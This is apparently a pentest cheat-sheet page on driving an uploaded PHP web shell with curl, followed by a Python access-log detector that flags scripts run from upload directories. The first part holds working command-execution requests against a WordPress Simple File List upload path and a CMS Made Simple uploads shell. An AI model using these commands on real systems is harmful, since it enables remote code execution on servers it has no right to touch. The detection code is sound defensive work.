Curl Command

curl -X POST -d "password=0064bb76d86370d20793bb00572fec23&cmd=system('ls');" http://$nukem/wp-content/uploads/simple-file-list/6247.php

-X sets the HTTP method (POST, GET, PUT).

-d specifies the POST data.

Then comes the URL.

If the server requires an HTTP login, you can specify the username and password directly in the curl command.

Example:

curl http://$ip/shell.php -u user:password

-u, --user user:password Server user and password

URL encoding using the curl command

If you have uploaded a web shell and want to run a command through it with curl, you can do so as follows.

curl "http://192.168.161.52/cmsms/uploads/shell.php" --data-urlencode 'cmd=id'

If you cannot see the output, use "--get". This tells curl to append the data to the URL's query string (i.e., use GET) instead of sending it in the request body. That way you get both URL encoding and a GET request.

curl --get "http://192.168.161.52/cmsms/uploads/shell.php" --data-urlencode 'cmd=id'
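
The difference between the two requests above is visible in the web server's access log: with --get the URL-encoded command sits in the query string and is logged, while POST data is not. The following is an added detection example, not part of the original page; the combined log format, the IP addresses, the sample lines and the regexes are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not from the page.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /cmsms/uploads/shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.4.0"
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cmsms/uploads/shell.php?cmd=uname%20-a HTTP/1.1" 200 98 "-" "curl/8.4.0"
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-content/uploads/simple-file-list/6247.php HTTP/1.1" 200 120 "-" "curl/8.4.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/uploads/2024/01/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Assumed log layout: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script execution out of an upload directory is the anomaly we key on.
UPLOAD_SCRIPT_RE = re.compile(r'/uploads/.*\.(php\d?|phtml)$', re.IGNORECASE)


def find_upload_script_hits(log_text):
    """Return one finding per request that runs a script under /uploads/."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not UPLOAD_SCRIPT_RE.search(url.path):
            continue
        # parse_qsl percent-decodes, so --data-urlencode values become readable.
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        findings.append({
            "ip": m["ip"],
            "method": m["method"],
            "path": url.path,
            "params": params,
            # POST bodies (-d, or --data-urlencode without --get) are not logged.
            "payload_logged": bool(params),
        })
    return findings


if __name__ == "__main__":
    for finding in find_upload_script_hits(SAMPLE_LOG):
        print(finding)
```

For the POST request only the method and path are flagged, so recovering what was sent requires request-body logging (for example through a WAF or audit module) rather than the access log alone.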
